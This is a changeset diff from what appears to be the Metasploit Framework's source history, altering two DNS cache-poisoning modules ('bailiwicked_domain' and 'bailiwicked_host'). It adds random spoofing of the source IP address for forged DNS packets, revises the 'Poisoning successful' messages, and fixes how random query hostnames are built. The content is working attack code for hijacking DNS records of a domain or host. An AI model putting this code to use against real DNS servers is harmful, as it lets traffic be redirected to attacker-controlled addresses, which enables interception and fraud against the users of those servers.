Changeset 5602
- Timestamp:
- 07/25/08 23:35:28 (2 months ago)
- Files:
Legend:
- Unmodified
- Added
- Removed
- Modified
- Copied
- Moved
framework3/trunk/modules/auxiliary/spoof/dns/bailiwicked_domain.rb
r5597 r5602 44 44 register_options( 45 45 [ 46 OptEnum.new('SRCADDR', [true, 'The source address to use for sending the queries', 'Real', ['Real', 'Random'], 'Real']), 46 47 OptPort.new('SRCPORT', [true, "The target server's source query port (0 for automatic)", nil]), 47 48 OptString.new('DOMAIN', [true, 'The domain to hijack', 'example.com']), … … 137 138 target = rhost() 138 139 source = Rex::Socket.source_address(target) 140 saddr = datastore['SRCADDR'] 139 141 sport = datastore['SRCPORT'] 140 142 domain = datastore['DOMAIN'] + '.' … … 280 282 req.rd = 1 281 283 284 src_ip = source 285 286 if(saddr == 'Random') 287 src_ip = Rex::Text.rand_text(4).unpack("C4").join(".") 288 end 289 282 290 buff = ( 283 291 Scruby::IP.new( 284 #:src => barbs[0][:addr].to_s, 285 :src => source, 292 :src => src_ip, 286 293 :dst => target, 287 294 :proto => 17 … … 351 358 answer.each_answer do |name, ttl, data| 352 359 if((name.to_s + ".") == domain and data.name.to_s == newdns) 353 print_status("Poisoning successful after #{queries} attempts: #{domain} == #{newdns}")360 print_status("Poisoning successful after #{queries} queries and #{responses} responses: #{domain} == #{newdns}") 354 361 srv_sock.close 355 362 disconnect_ip … … 386 393 times = [] 387 394 388 hostname = Rex::Text.rand_text_alphanumeric(16) + domain395 hostname = Rex::Text.rand_text_alphanumeric(16) + '.' + domain 389 396 390 397 sock = Rex::Socket.create_udp( … … 414 421 cnt = 0 415 422 416 hostname = Rex::Text.rand_text_alphanumeric(16) + domain423 hostname = Rex::Text.rand_text_alphanumeric(16) + '.' + domain 417 424 418 425 Thread.critical = false framework3/trunk/modules/auxiliary/spoof/dns/bailiwicked_host.rb
r5597 r5602 37 37 register_options( 38 38 [ 39 OptEnum.new('SRCADDR', [true, 'The source address to use for sending the queries', 'Real', ['Real', 'Random'], 'Real']), 39 40 OptPort.new('SRCPORT', [true, "The target server's source query port (0 for automatic)", nil]), 40 41 OptString.new('HOSTNAME', [true, 'Hostname to hijack', 'pwned.example.com']), … … 43 44 OptInt.new('XIDS', [true, 'The number of XIDs to try for each query (0 for automatic)', 0]), 44 45 OptInt.new('TTL', [true, 'The TTL for the malicious host entry', 31337]), 46 45 47 ], self.class) 46 48 … … 50 52 return { 51 53 "check" => "Determine if the specified DNS server (RHOST) is vulnerable", 52 "racer" => "Determine the size of the window for the target server" 54 "racer" => "Determine the size of the window for the target server", 53 55 } 54 56 end … … 130 132 target = rhost() 131 133 source = Rex::Socket.source_address(target) 134 saddr = datastore['SRCADDR'] 132 135 sport = datastore['SRCPORT'] 133 136 hostname = datastore['HOSTNAME'] + '.' … … 272 275 req.rd = 1 273 276 277 src_ip = source 278 279 if(saddr == 'Random') 280 src_ip = Rex::Text.rand_text(4).unpack("C4").join(".") 281 end 282 274 283 buff = ( 275 284 Scruby::IP.new( 276 #:src => barbs[0][:addr].to_s, 277 :src => source, 285 :src => src_ip, 278 286 :dst => target, 279 287 :proto => 17 … … 343 351 answer.each_answer do |name, ttl, data| 344 352 if((name.to_s + ".") == hostname and data.address.to_s == address) 345 print_status("Poisoning successful after #{queries} attempts: #{name} == #{address}")353 print_status("Poisoning successful after #{queries} queries and #{responses} responses: #{name} == #{address}") 346 354 disconnect_ip 347 355 return … … 375 383 times = [] 376 384 377 hostname = Rex::Text.rand_text_alphanumeric(16) + domain385 hostname = Rex::Text.rand_text_alphanumeric(16) + '.' + domain 378 386 379 387 sock = Rex::Socket.create_udp( … … 403 411 cnt = 0 404 412 405 hostname = Rex::Text.rand_text_alphanumeric(16) + domain413 hostname = Rex::Text.rand_text_alphanumeric(16) + '.' + domain 406 414 407 415 Thread.critical = false … … 455 463 avg_count 456 464 end 457 465 458 466 end 459 467 end
